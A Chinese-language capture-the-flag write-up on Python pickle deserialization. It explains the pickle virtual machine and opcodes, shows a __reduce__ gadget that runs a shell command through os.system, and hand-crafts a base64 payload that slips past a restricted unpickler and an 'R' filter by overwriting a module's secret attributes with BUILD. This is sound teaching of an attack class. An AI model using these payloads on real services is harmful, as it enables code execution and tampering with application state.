What is Pickle?
簡介
前幾天看到了p牛講的pickle反序列化的文章,比賽正好出了,給了一個實戰加深理解的機會。那么首先,我得知道pickle反序列化是什么東西。
pickle是一門棧語言,基於一個輕量的 PVM(Pickle Virtual Machine)。而PVM則主要包含指令處理器、stack和memo。
- 指令處理器:處理OPcode和參數,對其進行解析。最后留在棧頂的值將作為反序列化對象返回。
- stack:用來臨時存儲數據,參數和對象,由python的list實現,可理解為計算機的內存
- memo:為PVM整個生命周期提供存儲,由python的dict實現,可理解為計算機的硬盤存儲
指令集
當前用於 pickle 的協議共有 5 種。使用的協議版本越高,讀取生成的 pickle 所需的 Python 版本就要越新。
- v0 版協議是原始的 “人類可讀” 協議,並且向后兼容早期版本的 Python。
- v1 版協議是較早的二進制格式,它也與早期版本的 Python 兼容。
- v2 版協議是在 Python 2.3 中引入的。它為存儲 new-style class 提供了更高效的機制。欲了解有關第 2 版協議帶來的改進,請參閱 PEP 307。
- v3 版協議添加於 Python 3.0。它具有對 bytes 對象的顯式支持,且無法被 Python 2.x 打開。這是目前默認使用的協議,也是在要求與其他 Python 3 版本兼容時的推薦協議。
- v4 版協議添加於 Python 3.4。它支持存儲非常大的對象,能存儲更多種類的對象,還包括一些針對數據格式的優化。有關第 4 版協議帶來改進的信息,請參閱 PEP 3154。
指令集皆可在pickle源碼中查詢,下面給大家貼出來(比較長,可跳過
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
pickle序列化
pickle代碼主要依靠__reduce__魔術方法和手擼
-
__reduce__方法
class exp(object): def __reduce__(self): s = r"""touch /tmp/success""" return (os.system, (s,)) print(pickle.dumps(exp(), protocol=0)) >>>b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'
-
手擼代碼,可以依據pickletools進行調試分析
$python -m pickletools pickle.txt 0: c GLOBAL 'nt system' # 向棧頂壓入`posix.system`這個可執行對象 11: p PUT 0 # 將這個對象存儲到memo的第0個位置 14: ( MARK # 壓入一個元組的開始標志 15: V UNICODE 'touch /tmp/success' # 壓入一個字符串 35: p PUT 1 # 將這個字符串存儲到memo的第1個位置 38: t TUPLE (MARK at 14) # 將由剛壓入棧中的元素彈出,再將由這個元素組成的元組壓入棧中 39: p PUT 2 # 將這個元組存儲到memo的第2個位置 42: R REDUCE # 從棧上彈出兩個元素,分別是可執行對象和元組,並執行,結果壓入棧中 43: p PUT 3 # 將棧頂的元素(也就是剛才執行的結果)存儲到memo的第3個位置 46: . STOP # 結束 highest protocol among opcodes = 0 # v0協議 >>>b'''cnt system p0 (Vtouch /tmp/success p1 tp2 Rp3 .'''
注意:PVM 指令的書寫規范
(1)操作碼是單字節的
(2)帶參數的指令用換行符定界
題目分析
題目名字為webtmp,以下是題目源碼
import base64
import io
import sys
import pickle
from flask import Flask, Response, render_template, request
import secret
app = Flask(__name__)
class Animal:
def __init__(self, name, category):
self.name = name
self.category = category
def __repr__(self):
return f'Animal(name={self.name!r}, category={self.category!r})'
def __eq__(self, other):
return type(other) is Animal and self.name == other.name and self.category == other.category
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == '__main__':
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def restricted_loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
def read(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as fin:
return fin.read()
@app.route('/', methods=['GET', 'POST'])
def index():
if request.args.get('source'):
return Response(read(__file__), mimetype='text/plain')
if request.method == 'POST':
try:
pickle_data = request.form.get('data')
if b'R' in base64.b64decode(pickle_data):
return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
else:
result = restricted_loads(base64.b64decode(pickle_data))
if type(result) is not Animal:
return 'Are you sure that is an animal???'
correct = (result == Animal(secret.name, secret.category))
return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
except Exception as e:
print(repr(e))
return "Something wrong"
sample_obj = Animal('giaogiao', 'Giao')
pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
很容易發現兩個關鍵點
- pickle反序列化,但是find_class里面module限制了只能sys.module['__main__']
- 當correct為true時,可以獲得flag
那么從判斷條件來說,我們需要反序列化出一個animal對象,其屬性分別等於secret中的name和category,然后便可以通過驗證,拿到flag
題目中secret.py沒有給出,不過可以不難猜出其大概長什么樣
# secret.py
name="xxx"
category="?????"
#test
a = sys.modules['__main__'].secret.name
print(a) # xxx
接下來就有幾種思路了
- 獲取secret中的name和category值,然后用其創建animal對象
- 覆蓋name和category的值,然后用自己覆蓋的值去創建animal對象
第一種方法,經過各種嘗試,無法實現__main__.secret.name的方式
那么考慮第二種思路,在翻閱pickle的各種協議文檔時,在協議2文檔中發現
可以通過反序列化更改其屬性值 對應操作碼為
BUILD = b'b' # call __setstate__ or __dict__.update()
這下思路就比較清晰了,先覆蓋屬性值,再生成animal對象,那么接下來就開始手擼pickle碼
開始構造
# 第一部分payload,傳入字典覆蓋屬性值
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# 第二部分payload,構造對象
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp)
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# 合並payload
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
Getflag
相關鏈接: